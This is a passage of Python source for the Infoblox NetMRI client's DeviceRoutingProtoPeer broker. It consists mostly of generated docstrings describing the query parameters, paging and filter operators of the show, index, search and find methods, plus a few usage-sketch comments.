| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peer: The device routing proto peer identified by the specified DeviceRPPeerID.
:rtype device_routing_proto_peer: DeviceRoutingProtoPeer
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
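    # Illustrative usage sketch (editorial addition, not generated API docs).
    # It assumes the package's InfobloxNetMRI client and its get_broker()
    # helper; the host and credentials are placeholders.
    #
    #     from infoblox_netmri.client import InfobloxNetMRI
    #     client = InfobloxNetMRI(host="netmri.example.com",
    #                             username="admin", password="secret")
    #     broker = client.get_broker("DeviceRoutingProtoPeer")
    #     peer = broker.show(DeviceRPPeerID=1234,
    #                        include=["device", "peer_device"])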
def index(self, **kwargs):
"""Lists the available device routing proto peers. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
            :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit input for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
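    # Pagination sketch (editorial addition): index() honors the start/limit
    # semantics described above, so a full listing can be walked in fixed-size
    # pages. Assumes a `broker` obtained as in the sketch after show().
    #
    #     start, limit = 0, 1000
    #     while True:
    #         page = broker.index(start=start, limit=limit,
    #                             sort=["DeviceRPPeerID"], dir=["asc"])
    #         for peer in page:
    #             print(peer.DeviceRPPeerID, peer.RouteProto, peer.RPPeerState)
    #         if len(page) < limit:
    #             break
    #         start += limit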
def search(self, **kwargs):
"""Lists the available device routing proto peers matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
            :param BGPLocalIPDotted: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation.
:type BGPLocalIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param BGPLocalIPDotted: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation.
:type BGPLocalIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
            :param BGPLocalIPNumeric: The numerical local IP address for this peer relationship's BGP connection.
:type BGPLocalIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param BGPLocalIPNumeric: The numerical local IP address for this peer relationship's BGP connection.
:type BGPLocalIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPLocalPort: The local TCP port number for this entry's BGP connection.
:type BGPLocalPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPLocalPort: The local TCP port number for this entry's BGP connection.
:type BGPLocalPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPPeerPort: The remote TCP port number for this entry's BGP connection.
:type BGPPeerPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPPeerPort: The remote TCP port number for this entry's BGP connection.
:type BGPPeerPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship.
:type DeviceRPPeerID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up.
:type EigrpRetransCount: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up.
:type EigrpRetransCount: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e. resent to this peer to be acknowledged.
:type EigrpRetriesCount: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e. resent to this peer to be acknowledged.
:type EigrpRetriesCount: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available.
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available.
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer.
:type OspfPeerAddresslessIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer.
:type OspfPeerAddresslessIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state, since the last time NetMRI polled the device.
:type OspfPeerEventsDelta: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state, since the last time NetMRI polled the device.
:type OspfPeerEventsDelta: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerPermanence: How this neighbor was determined, 'dynamic' for learned through the protocol, 'permanent' for configured.
:type OspfPeerPermanence: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerPermanence: How this neighbor was determined, 'dynamic' for learned through the protocol, 'permanent' for configured.
:type OspfPeerPermanence: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant.
:type OspfPeerRouterIdentDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant.
:type OspfPeerRouterIdentDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer.
:type OspfPeerRouterIdentNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer.
:type OspfPeerRouterIdentNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PeerDeviceID: The internal NetMRI identifier for the peer device.
:type PeerDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PeerDeviceID: The internal NetMRI identifier for the peer device.
:type PeerDeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available.
:type PeerInterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available.
:type PeerInterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision.
:type RPPeerChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision.
:type RPPeerChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type RPPeerEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type RPPeerEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format.
:type RPPeerIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format.
:type RPPeerIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerIPNumeric: The numerical IP address of the peer.
:type RPPeerIPNumeric: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerIPNumeric: The numerical IP address of the peer.
:type RPPeerIPNumeric: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerMapSource: Internal tracking data for NetMRI algorithms.
:type RPPeerMapSource: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerMapSource: Internal tracking data for NetMRI algorithms.
:type RPPeerMapSource: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerStartTime: The starting effective time of this revision of the record.
:type RPPeerStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerStartTime: The starting effective time of this revision of the record.
:type RPPeerStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerState: The protocol-specific state of this routing peer relationship.
:type RPPeerState: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerState: The protocol-specific state of this routing peer relationship.
:type RPPeerState: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerTimestamp: The date and time this record was collected or calculated.
:type RPPeerTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerTimestamp: The date and time this record was collected or calculated.
:type RPPeerTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example).
:type RPPeerType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example).
:type RPPeerType: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RPPeerUpSince: The date and time this peer relationship has been active, without interruption. The granularity level varies with each protocol.
:type RPPeerUpSince: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RPPeerUpSince: The date and time this peer relationship has been active, without interruption. The granularity level varies with each protocol.
:type RPPeerUpSince: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RouteProto: Identifies the routing protocol used for this peer relationship.
:type RouteProto: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RouteProto: Identifies the routing protocol used for this peer relationship.
:type RouteProto: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship.
:type RoutingAreaID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device routing proto peers as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device routing proto peer methods. The listed methods will be called on each device routing proto peer returned and included in the output. Available methods are: peer_device, peer_interface, data_source, device, interface, routing_area, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: peer_device, peer_interface, data_source, device, interface, routing_area.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
            :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit input for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceRPPeerID
:param sort: The data field(s) to use for sorting the output. Default is DeviceRPPeerID. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceRoutingProtoPeer. Valid values are DeviceRPPeerID, RPPeerStartTime, RPPeerEndTime, RPPeerChangedCols, RPPeerTimestamp, DeviceID, InterfaceID, IfAddrID, RPPeerMapSource, RPPeerType, RouteProto, RoutingAreaID, RPPeerIPDotted, RPPeerIPNumeric, PeerDeviceID, PeerInterfaceID, RPPeerState, RPPeerUpSince, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, EigrpRetransCount, EigrpRetriesCount, BGPPeerPort, BGPLocalPort, BGPLocalIPDotted, BGPLocalIPNumeric, DataSourceID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device routing proto peers, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BGPLocalIPDotted, BGPLocalIPNumeric, BGPLocalPort, BGPPeerPort, DataSourceID, DeviceID, DeviceRPPeerID, EigrpRetransCount, EigrpRetriesCount, IfAddrID, InterfaceID, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, PeerDeviceID, PeerInterfaceID, RPPeerChangedCols, RPPeerEndTime, RPPeerIPDotted, RPPeerIPNumeric, RPPeerMapSource, RPPeerStartTime, RPPeerState, RPPeerTimestamp, RPPeerType, RPPeerUpSince, RouteProto, RoutingAreaID.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
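    # Query sketch (editorial addition): search() filters on field values plus
    # an optional free-text `query`, while find() (below) takes op_/val_c_
    # pairs per field. The values shown are placeholders.
    #
    #     bgp_peers = broker.search(RPPeerType=["BGP"], query="Established")
    #     recent = broker.find(op_RPPeerTimestamp=">=",
    #                          val_c_RPPeerTimestamp="2023-01-01 00:00:00")
    #
    # Both calls return an array of DeviceRoutingProtoPeer objects, as noted
    # in the outputs sections above.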
def find(self, **kwargs):
"""Lists the available device routing proto peers matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BGPLocalIPDotted, BGPLocalIPNumeric, BGPLocalPort, BGPPeerPort, DataSourceID, DeviceID, DeviceRPPeerID, EigrpRetransCount, EigrpRetriesCount, IfAddrID, InterfaceID, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, PeerDeviceID, PeerInterfaceID, RPPeerChangedCols, RPPeerEndTime, RPPeerIPDotted, RPPeerIPNumeric, RPPeerMapSource, RPPeerStartTime, RPPeerState, RPPeerTimestamp, RPPeerType, RPPeerUpSince, RouteProto, RoutingAreaID.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param op_BGPLocalIPDotted: The operator to apply to the field BGPLocalIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalIPDotted: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalIPDotted: If op_BGPLocalIPDotted is specified, the field named in this input will be compared to the value in BGPLocalIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalIPDotted must be specified if op_BGPLocalIPDotted is specified.
:type val_f_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalIPDotted: If op_BGPLocalIPDotted is specified, this value will be compared to the value in BGPLocalIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalIPDotted must be specified if op_BGPLocalIPDotted is specified.
:type val_c_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
            :param op_BGPLocalIPNumeric: The operator to apply to the field BGPLocalIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalIPNumeric: The numerical local IP address for this peer relationship's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalIPNumeric: If op_BGPLocalIPNumeric is specified, the field named in this input will be compared to the value in BGPLocalIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalIPNumeric must be specified if op_BGPLocalIPNumeric is specified.
:type val_f_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalIPNumeric: If op_BGPLocalIPNumeric is specified, this value will be compared to the value in BGPLocalIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalIPNumeric must be specified if op_BGPLocalIPNumeric is specified.
:type val_c_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPLocalPort: The operator to apply to the field BGPLocalPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalPort: The local TCP port number for this entry's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalPort: If op_BGPLocalPort is specified, the field named in this input will be compared to the value in BGPLocalPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalPort must be specified if op_BGPLocalPort is specified.
:type val_f_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalPort: If op_BGPLocalPort is specified, this value will be compared to the value in BGPLocalPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalPort must be specified if op_BGPLocalPort is specified.
:type val_c_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
